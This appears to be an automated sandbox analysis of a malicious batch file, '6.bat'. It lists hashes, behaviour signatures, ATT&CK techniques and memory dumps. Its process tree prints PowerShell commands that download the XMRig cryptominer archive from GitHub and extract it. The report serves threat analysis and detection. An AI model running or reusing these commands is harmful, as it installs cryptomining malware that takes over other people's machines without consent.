Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 02:54

General

  • Target

    6.bat

  • Size

    599B

  • MD5

    798b979417aa88e5323ead9be2d8425c

  • SHA1

    a54c5133c71afddf697f302b36bdb930c72852ce

  • SHA256

    f83d724987f9f4a0843c0b0abd01f3f5ceccbc8e7babad76c2639e1bef2fee07

  • SHA512

    a4f2ff598bc26b5ee7778b34b34aafd20e43f714c5f841b9fe73cdc6e1c3e47e44ffb94ff06ccd7dd263116201ff6754c956c1ea8f588acf6927f35446b5036b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\6.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2752
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip', 'xmrig-6.21.3-msvc-win64.zip')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1724
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Path 'xmrig-6.21.3-msvc-win64.zip' -DestinationPath '.'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2636

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H8IPGN89QJ83E80XQXM2.temp
    Filesize

    7KB

    MD5

    71502348f594b096fb7d7f864adb95d9

    SHA1

    5af5c70714370c0d7536fa17227e603ce53648ad

    SHA256

    2b430b83fe38f0f096ee03cc6c5835892ff40624b4038471cb118760ae56957e

    SHA512

    83a42e96cec530ea9bf1ef84a339aa0050c308bd03f53ea8a48beda21fbc5289e95eaac591b4e5c6daafb152bb2a61316b1f184f8613ae2f637e197a8d0d0337

  • memory/1724-5-0x000000001B700000-0x000000001B9E2000-memory.dmp
    Filesize

    2.9MB

  • memory/1724-4-0x000007FEF5A1E000-0x000007FEF5A1F000-memory.dmp
    Filesize

    4KB

  • memory/1724-6-0x00000000021D0000-0x00000000021D8000-memory.dmp
    Filesize

    32KB

  • memory/1724-7-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp
    Filesize

    9.6MB

  • memory/1724-11-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp
    Filesize

    9.6MB

  • memory/1724-10-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp
    Filesize

    9.6MB

  • memory/1724-8-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp
    Filesize

    9.6MB

  • memory/1724-9-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp
    Filesize

    9.6MB

  • memory/1724-12-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp
    Filesize

    9.6MB

  • memory/2636-19-0x0000000002710000-0x0000000002718000-memory.dmp
    Filesize

    32KB

  • memory/2636-18-0x000000001B660000-0x000000001B942000-memory.dmp
    Filesize

    2.9MB